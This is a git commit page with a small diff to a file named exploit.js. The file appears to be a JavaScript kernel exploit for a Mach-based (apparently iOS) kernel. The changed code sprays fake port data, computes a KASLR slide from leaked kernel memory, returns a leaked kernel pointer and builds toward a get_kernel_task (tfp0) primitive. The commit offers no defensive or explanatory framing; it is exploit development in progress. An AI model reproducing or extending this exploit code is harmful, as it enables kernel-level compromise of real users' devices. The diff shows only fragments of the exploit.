more shit

author: spv420 <unomilliono@gmail.com> 2022-04-24 14:18:41 -0400
committer: spv420 <unomilliono@gmail.com> 2022-04-24 14:18:41 -0400
commit: 8d989c872c7127f12ebc19b0c9a98916657f571f (patch)
tree: 0dfbcd25b6c61dcba4a250a8175c683b40aa0950 /src/js
parent: 3b49965546a678f46085e961f729b179c7542f89 (diff)
1 files changed, 6 insertions, 2 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 5296e6e..402dd9f 100644
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -20,6 +20,8 @@ var KERN_SUCCESS = 0;
 var NULL = 0;
 var MACH_PORT_NULL = 0;
 
+var kslide = 0;
+
 var fakeportData = 0;
 
 var kOSSerializeDictionary      = 0x01000000;
@@ -130,11 +132,11 @@ function copyinPort(kport, cnt) {
 //			mach_port_deallocate(self, read_u32(data));
 //			write_u32(data, MACH_PORT_NULL);
 			spray_data(tst, strlen(tst) + 1, 10, fakeportData);
-			var kslide = (((read_u32(buf + (9 << 2)) & 0xFFF00000) + 0x1000) -0x80001000) >>> 0;
+			kslide = (((read_u32(buf + (9 << 2)) & 0xFFF00000) + 0x1000) -0x80001000) >>> 0;
 			printf("still alive? %x\n", 420);
 			printf("YOLO YOLO YOLO kaslr_slide=%s\n", kslide.toString(16));
-			sleep(1);
 			found = true;
+			return (read_u32(buf + (4 << 2)) - 0x78);
 		}
 	}
 
@@ -177,6 +179,8 @@ function get_kernel_task() {
 	sched_yield();
 	var kptr = copyinPort(kport, 2);
 
+	printf("0x%08x\n", kptr);
+
 	printf("get lucky\n");
 
 	return tfp0;
author	spv420 <unomilliono@gmail.com>	2022-04-24 14:18:41 -0400
committer	spv420 <unomilliono@gmail.com>	2022-04-24 14:18:41 -0400
commit	8d989c872c7127f12ebc19b0c9a98916657f571f (patch)
tree	0dfbcd25b6c61dcba4a250a8175c683b40aa0950 /src/js
parent	3b49965546a678f46085e961f729b179c7542f89 (diff)